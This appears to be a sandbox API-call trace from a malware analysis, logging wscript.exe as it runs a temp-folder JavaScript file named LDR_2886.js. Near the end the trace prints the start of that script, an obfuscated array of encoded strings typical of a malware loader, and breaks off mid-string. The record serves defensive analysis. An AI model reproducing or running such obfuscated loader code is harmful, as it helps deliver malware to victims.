
Thread:
	id = 270
	os_tid = 0x5cc


Thread:
	id = 272
	os_tid = 0x9cc


Thread:
	id = 273
	os_tid = 0xb0c


Thread:
	id = 275
	os_tid = 0xa04


Thread:
	id = 276
	os_tid = 0x38c


Thread:
	id = 303
	os_tid = 0x6fc


Thread:
	id = 312
	os_tid = 0x764


Process:
	id = "34"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x43905000"
	os_pid = "0x6a8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 279
	os_tid = 0x794

	[0108.572] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fb70 | out: lpSystemTimeAsFileTime=0x14fb70*(dwLowDateTime=0xb8f77a70, dwHighDateTime=0x1d543d1)) 
	[0108.572] GetCurrentProcessId () returned 0x6a8
	[0108.572] GetCurrentThreadId () returned 0x794
	[0108.572] GetTickCount () returned 0x2b95f
	[0108.572] QueryPerformanceCounter (in: lpPerformanceCount=0x14fb78 | out: lpPerformanceCount=0x14fb78*=23299783442) returned 1
	[0108.572] GetStartupInfoA (in: lpStartupInfo=0x14fb90 | out: lpStartupInfo=0x14fb90*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0108.573] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0108.573] GetModuleHandleA (lpModuleName=0x0) returned 0xffa90000
	[0108.573] GetVersionExA (in: lpVersionInformation=0x14fab0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x261eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14fab0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0108.573] GetUserDefaultLCID () returned 0x409
	[0108.574] CoInitialize (pvReserved=0x0) returned 0x0
	[0108.588] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0108.588] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0108.588] ??2@YAPEAX_K@Z () returned 0x5557b0
	[0108.588] ??2@YAPEAX_K@Z () returned 0x555f60
	[0108.588] GetCurrentThreadId () returned 0x794
	[0108.588] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f7f8 | out: phkResult=0x14f7f8*=0x7c) returned 0x0
	[0108.589] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f7f0 | out: phkResult=0x14f7f0*=0x80) returned 0x0
	[0108.589] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x14eaf8, lpData=0x14ef00, lpcbData=0x14eaf0*=0x400 | out: lpType=0x14eaf8*=0x0, lpData=0x14ef00*=0x67, lpcbData=0x14eaf0*=0x400) returned 0x2
	[0108.589] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x14eaf8, lpData=0x14ef00, lpcbData=0x14eaf0*=0x400 | out: lpType=0x14eaf8*=0x0, lpData=0x14ef00*=0x67, lpcbData=0x14eaf0*=0x400) returned 0x2
	[0108.589] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x14eaf8, lpData=0x14ef00, lpcbData=0x14eaf0*=0x400 | out: lpType=0x14eaf8*=0x0, lpData=0x14ef00*=0x67, lpcbData=0x14eaf0*=0x400) returned 0x2
	[0108.589] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0109.835] RegCloseKey (hKey=0x80) returned 0x0
	[0109.835] RegCloseKey (hKey=0x7c) returned 0x0
	[0109.835] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f510 | out: phkResult=0x14f510*=0x7c) returned 0x0
	[0109.835] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f508 | out: phkResult=0x14f508*=0x80) returned 0x0
	[0109.836] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x14e818, lpData=0x14ec20, lpcbData=0x14e810*=0x400 | out: lpType=0x14e818*=0x0, lpData=0x14ec20*=0x0, lpcbData=0x14e810*=0x400) returned 0x2
	[0109.836] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x14e818, lpData=0x14ec20, lpcbData=0x14e810*=0x400 | out: lpType=0x14e818*=0x0, lpData=0x14ec20*=0x0, lpcbData=0x14e810*=0x400) returned 0x2
	[0109.836] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x14e818, lpData=0x14ec20, lpcbData=0x14e810*=0x400 | out: lpType=0x14e818*=0x0, lpData=0x14ec20*=0x0, lpcbData=0x14e810*=0x400) returned 0x2
	[0109.836] RegCloseKey (hKey=0x80) returned 0x0
	[0109.836] RegCloseKey (hKey=0x7c) returned 0x0
	[0109.836] GetACP () returned 0x4e4
	[0109.836] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0109.836] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0109.836] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0109.836] FreeLibrary (hLibModule=0x77040000) returned 1
	[0109.836] ??2@YAPEAX_K@Z () returned 0x555f80
	[0109.837] CoRegisterMessageFilter (in: lpMessageFilter=0x555f80, lplpMessageFilter=0x555f90 | out: lplpMessageFilter=0x555f90*=0x0) returned 0x0
	[0109.837] GetModuleFileNameW (in: hModule=0xffa90000, lpFilename=0x14f850, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0109.837] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x14f1a0 | out: lpdwHandle=0x14f1a0) returned 0x704
	[0109.838] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x14ea90 | out: lpData=0x14ea90) returned 1
	[0109.838] VerQueryValueW (in: pBlock=0x14ea90, lpSubBlock="\\", lplpBuffer=0x14f1a8, puLen=0x14f1a4 | out: lplpBuffer=0x14f1a8*=0x14eab8, puLen=0x14f1a4) returned 1
	[0109.838] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f1f8 | out: phkResult=0x14f1f8*=0x7c) returned 0x0
	[0109.838] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x14e548, lpData=0x14e950, lpcbData=0x14e540*=0x400 | out: lpType=0x14e548*=0x0, lpData=0x14e950*=0x0, lpcbData=0x14e540*=0x400) returned 0x2
	[0109.838] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f1b0 | out: phkResult=0x14f1b0*=0x80) returned 0x0
	[0109.838] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x14f174, lpData=0x14f1f0, lpcbData=0x14f170*=0x4 | out: lpType=0x14f174*=0x0, lpData=0x14f1f0*=0x20, lpcbData=0x14f170*=0x4) returned 0x2
	[0109.838] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x14e548, lpData=0x14e950, lpcbData=0x14e540*=0x400 | out: lpType=0x14e548*=0x0, lpData=0x14e950*=0x0, lpcbData=0x14e540*=0x400) returned 0x2
	[0109.838] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x14f174, lpData=0x14f1f0, lpcbData=0x14f170*=0x4 | out: lpType=0x14f174*=0x0, lpData=0x14f1f0*=0x20, lpcbData=0x14f170*=0x4) returned 0x2
	[0109.838] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x14e548, lpData=0x14e950, lpcbData=0x14e540*=0x400 | out: lpType=0x14e548*=0x1, lpData="1", lpcbData=0x14e540*=0x4) returned 0x0
	[0109.838] lstrlenW (lpString="1") returned 1
	[0109.838] lstrlenW (lpString="0") returned 1
	[0109.838] lstrlenW (lpString="1") returned 1
	[0109.838] lstrlenW (lpString="no") returned 2
	[0109.838] lstrlenW (lpString="1") returned 1
	[0109.838] lstrlenW (lpString="false") returned 5
	[0109.838] RegCloseKey (hKey=0x80) returned 0x0
	[0109.838] RegCloseKey (hKey=0x7c) returned 0x0
	[0109.838] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x14f1f8, lpdwDisposition=0x0 | out: phkResult=0x14f1f8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0109.838] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x14f194, lpData=0x14f1f0, lpcbData=0x14f190*=0x4 | out: lpType=0x14f194*=0x0, lpData=0x14f1f0*=0x20, lpcbData=0x14f190*=0x4) returned 0x2
	[0109.839] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x14e568, lpData=0x14e970, lpcbData=0x14e560*=0x400 | out: lpType=0x14e568*=0x1, lpData="1", lpcbData=0x14e560*=0x4) returned 0x0
	[0109.839] lstrlenW (lpString="1") returned 1
	[0109.839] lstrlenW (lpString="0") returned 1
	[0109.839] lstrlenW (lpString="1") returned 1
	[0109.839] lstrlenW (lpString="no") returned 2
	[0109.839] lstrlenW (lpString="1") returned 1
	[0109.839] lstrlenW (lpString="false") returned 5
	[0109.839] RegCloseKey (hKey=0x7c) returned 0x0
	[0109.839] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x14f1f8, lpdwDisposition=0x0 | out: phkResult=0x14f1f8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0109.839] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x14f194, lpData=0x14f1f0, lpcbData=0x14f190*=0x4 | out: lpType=0x14f194*=0x0, lpData=0x14f1f0*=0x20, lpcbData=0x14f190*=0x4) returned 0x2
	[0109.839] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x14e568, lpData=0x14e970, lpcbData=0x14e560*=0x400 | out: lpType=0x14e568*=0x0, lpData=0x14e970*=0x31, lpcbData=0x14e560*=0x400) returned 0x2
	[0109.839] RegCloseKey (hKey=0x7c) returned 0x0
	[0109.839] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0109.839] lstrlenW (lpString="js") returned 2
	[0109.839] lstrlenW (lpString="WSH") returned 3
	[0109.839] ??2@YAPEAX_K@Z () returned 0x555870
	[0109.839] LoadStringW (in: hInstance=0xffa90000, uID=0x9c5, lpBuffer=0x14dc60, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0109.840] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x14eca0*=0x0 | out: pptlib=0x14eca0*=0x28d100) returned 0x0
	[0109.844] ITypeLib:GetTypeInfoOfGuid (in: This=0x28d100, GUID=0xffa958f0, ppTInfo=0x14ec88 | out: ppTInfo=0x14ec88*=0x28e4e8) returned 0x0
	[0109.846] ITypeInfo:GetRefTypeOfImplType (in: This=0x28e4e8, index=0xffffffff, pRefType=0x14ec80 | out: pRefType=0x14ec80*=0xfffffffe) returned 0x0
	[0109.846] ITypeInfo:GetRefTypeInfo (in: This=0x28e4e8, hreftype=0xfffffffe, ppTInfo=0xffaaf458 | out: ppTInfo=0xffaaf458*=0x28e540) returned 0x0
	[0109.846] IUnknown:Release (This=0x28e4e8) returned 0x1
	[0109.846] ??2@YAPEAX_K@Z () returned 0x555900
	[0109.847] ??2@YAPEAX_K@Z () returned 0x5559a0
	[0109.847] ??2@YAPEAX_K@Z () returned 0x555a00
	[0109.847] ITypeLib:GetTypeInfoOfGuid (in: This=0x28d100, GUID=0xffa95950, ppTInfo=0x14ec88 | out: ppTInfo=0x14ec88*=0x28e598) returned 0x0
	[0109.847] ITypeInfo:GetRefTypeOfImplType (in: This=0x28e598, index=0xffffffff, pRefType=0x14ec80 | out: pRefType=0x14ec80*=0xfffffffe) returned 0x0
	[0109.847] ITypeInfo:GetRefTypeInfo (in: This=0x28e598, hreftype=0xfffffffe, ppTInfo=0xffaaf4d8 | out: ppTInfo=0xffaaf4d8*=0x28e5f0) returned 0x0
	[0109.847] IUnknown:Release (This=0x28e598) returned 0x1
	[0109.847] ITypeLib:GetTypeInfoOfGuid (in: This=0x28d100, GUID=0xffa95960, ppTInfo=0x14ec88 | out: ppTInfo=0x14ec88*=0x28e648) returned 0x0
	[0109.847] ITypeInfo:GetRefTypeOfImplType (in: This=0x28e648, index=0xffffffff, pRefType=0x14ec80 | out: pRefType=0x14ec80*=0xfffffffe) returned 0x0
	[0109.847] ITypeInfo:GetRefTypeInfo (in: This=0x28e648, hreftype=0xfffffffe, ppTInfo=0xffaaf518 | out: ppTInfo=0xffaaf518*=0x28e6a0) returned 0x0
	[0109.847] IUnknown:Release (This=0x28e648) returned 0x1
	[0109.847] ITypeLib:GetTypeInfoOfGuid (in: This=0x28d100, GUID=0xffa95910, ppTInfo=0x14ec88 | out: ppTInfo=0x14ec88*=0x28e6f8) returned 0x0
	[0109.847] ITypeInfo:GetRefTypeOfImplType (in: This=0x28e6f8, index=0xffffffff, pRefType=0x14ec80 | out: pRefType=0x14ec80*=0xfffffffe) returned 0x0
	[0109.847] ITypeInfo:GetRefTypeInfo (in: This=0x28e6f8, hreftype=0xfffffffe, ppTInfo=0xffaaf498 | out: ppTInfo=0xffaaf498*=0x28e750) returned 0x0
	[0109.847] IUnknown:Release (This=0x28e6f8) returned 0x1
	[0109.847] IUnknown:Release (This=0x28d100) returned 0x4
	[0109.847] ??2@YAPEAX_K@Z () returned 0x555a60
	[0109.847] GetCurrentThreadId () returned 0x794
	[0109.848] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0109.848] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xffaa1cf8, lpParameter=0x555a60, dwCreationFlags=0x0, lpThreadId=0x555a88 | out: lpThreadId=0x555a88*=0x178) returned 0xd4
	[0109.848] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x14eee0*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0110.412] CloseHandle (hObject=0xcc) returned 1
	[0110.412] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x14ef70, lpFilePart=0x14ef60 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x14ef60*="LDR_2886.js") returned 0x30
	[0110.412] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e480 | out: phkResult=0x14e480*=0xe6) returned 0x0
	[0110.412] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x14e430, lpData=0x14e490, lpcbData=0x14e434*=0x800 | out: lpType=0x14e430*=0x1, lpData="JSFile", lpcbData=0x14e434*=0xe) returned 0x0
	[0110.412] RegCloseKey (hKey=0xe6) returned 0x0
	[0110.412] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e480 | out: phkResult=0x14e480*=0xe6) returned 0x0
	[0110.412] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x14e430, lpData=0x14ed00, lpcbData=0x14e434*=0x200 | out: lpType=0x14e430*=0x1, lpData="JScript", lpcbData=0x14e434*=0x10) returned 0x0
	[0110.413] RegCloseKey (hKey=0xe6) returned 0x0
	[0110.413] ??2@YAPEAX_K@Z () returned 0x5563a0
	[0110.413] GetProcessHeap () returned 0x260000
	[0110.413] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2000) returned 0x298430
	[0110.413] CLSIDFromString (in: lpsz="JScript", pclsid=0x14ec78 | out: pclsid=0x14ec78*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0110.414] CoCreateInstance (in: rclsid=0x14ec78*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xffa91800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14ec70 | out: ppv=0x14ec70*=0x556780) returned 0x0
	[0110.421] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ce70 | out: lpSystemTimeAsFileTime=0x14ce70*(dwLowDateTime=0xba105cb0, dwHighDateTime=0x1d543d1)) 
	[0110.421] GetCurrentProcessId () returned 0x6a8
	[0110.421] GetCurrentThreadId () returned 0x794
	[0110.421] GetTickCount () returned 0x2c090
	[0110.421] QueryPerformanceCounter (in: lpPerformanceCount=0x14ce78 | out: lpPerformanceCount=0x14ce78*=23484739601) returned 1
	[0110.422] malloc (_Size=0x100) returned 0x556670
	[0110.422] __dllonexit () returned 0x7fee1410728
	[0110.422] __dllonexit () returned 0x7fee1410780
	[0110.422] __dllonexit () returned 0x7fee1410750
	[0110.422] __dllonexit () returned 0x7fee14107b0
	[0110.423] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0110.423] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0110.423] EtwRegisterTraceGuidsA () returned 0x0
	[0110.423] EtwRegisterTraceGuidsA () returned 0x0
	[0110.423] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14ca60, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0110.424] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0110.424] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x14cbc8 | out: phkResult=0x14cbc8*=0x0) returned 0x2
	[0110.429] GetVersion () returned 0x1db10106
	[0110.430] ??2@YAPEAX_K@Z () returned 0x555aa0
	[0110.430] ??2@YAPEAX_K@Z () returned 0x556780
	[0110.430] GetUserDefaultLCID () returned 0x409
	[0110.430] GetACP () returned 0x4e4
	[0110.430] ??3@YAXPEAX@Z () returned 0x46511f01
	[0110.430] GetCurrentThreadId () returned 0x794
	[0110.431] ??2@YAPEAX_K@Z () returned 0x555aa0
	[0110.431] GetCurrentThreadId () returned 0x794
	[0110.431] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eba8 | out: phkResult=0x14eba8*=0x104) returned 0x0
	[0110.431] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0110.431] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x14eba0, lpData=0x14eb98, lpcbData=0x14eb90*=0x4 | out: lpType=0x14eba0*=0x4, lpData=0x14eb98*=0x1, lpcbData=0x14eb90*=0x4) returned 0x0
	[0110.431] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0110.431] RegCloseKey (hKey=0x104) returned 0x0
	[0110.431] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0110.431] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0110.431] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0110.431] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0110.431] CoCreateInstance (in: rclsid=0x7fee147cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee147cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14eb70 | out: ppv=0x14eb70*=0x7fefec0a1b0) returned 0x0
	[0110.432] ??2@YAPEAX_K@Z () returned 0x556b30
	[0110.433] ??2@YAPEAX_KHPEBDH@Z () returned 0x555af0
	[0110.433] ??2@YAPEAX_K@Z () returned 0x556bf0
	[0110.433] ??2@YAPEAX_K@Z () returned 0x556c50
	[0110.433] ??2@YAPEAX_K@Z () returned 0x557140
	[0110.433] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x14eb30, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0110.433] GetUserDefaultLCID () returned 0x409
	[0110.433] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0110.433] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x14ebd0, cchData=6 | out: lpLCData="1252") returned 5
	[0110.433] IsValidCodePage (CodePage=0x4e4) returned 1
	[0110.433] CoCreateInstance (in: rclsid=0x7fee1475d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee1475d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x556af0 | out: ppv=0x556af0*=0x2975b0) returned 0x0
	[0110.434] IUnknown:AddRef (This=0x2975b0) returned 0x2
	[0110.434] GetCurrentProcessId () returned 0x6a8
	[0110.434] GetCurrentThreadId () returned 0x794
	[0110.434] GetTickCount () returned 0x2c09f
	[0110.434] ISystemDebugEventFire:BeginSession (This=0x2975b0, guidSourceID=0x7fee1475da8, strSessionName="JScript:00001704:00001940:18180383") returned 0x0
	[0110.434] GetCurrentThreadId () returned 0x794
	[0110.434] ??2@YAPEAX_K@Z () returned 0x5571e0
	[0110.434] ??2@YAPEAX_K@Z () returned 0x557230
	[0110.434] malloc (_Size=0x80) returned 0x5572e0
	[0110.434] malloc (_Size=0x108) returned 0x557370
	[0110.434] GetTickCount () returned 0x2c09f
	[0110.434] GetCurrentThreadId () returned 0x794
	[0110.434] ??2@YAPEAX_K@Z () returned 0x557480
	[0110.434] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0110.434] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0110.434] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0110.434] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x210000
	[0110.435] GetVersionExA (in: lpVersionInformation=0x14ed80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14ed80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0110.435] IsTextUnicode (in: lpv=0x210000, iSize=19304, lpiResult=0x14ed70 | out: lpiResult=0x14ed70) returned 0
	[0110.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0110.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x210000, cbMultiByte=19304, lpWideCharStr=0x29f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDg